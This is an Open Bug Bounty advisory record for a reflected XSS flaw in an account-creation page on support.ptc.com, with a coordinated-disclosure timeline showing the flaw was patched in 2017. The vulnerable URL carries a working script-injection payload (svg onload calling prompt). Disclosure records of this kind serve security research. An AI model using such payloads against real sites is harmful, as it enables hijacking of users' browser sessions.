support.ptc.com XSS vulnerability

2017-10-18T01:47:00
ID OBB:343103
Type openbugbounty
Reporter eb
Modified 2017-11-18T00:02:00

Description

Vulnerable URL:
https://support.ptc.com/appserver/common/account/createAccount.jsp?tab=basic&title;=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E\n
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 October, 2017 01:47 GMT
Generic security notifications sent to website owner| 18 October, 2017 07:58 GMT
Notification sent to subscribers (without technical details)| 18 October, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 17 November, 2017 10:31 GMT
Vulnerability patched by the website owner| 18 November, 2017 00:02 GMT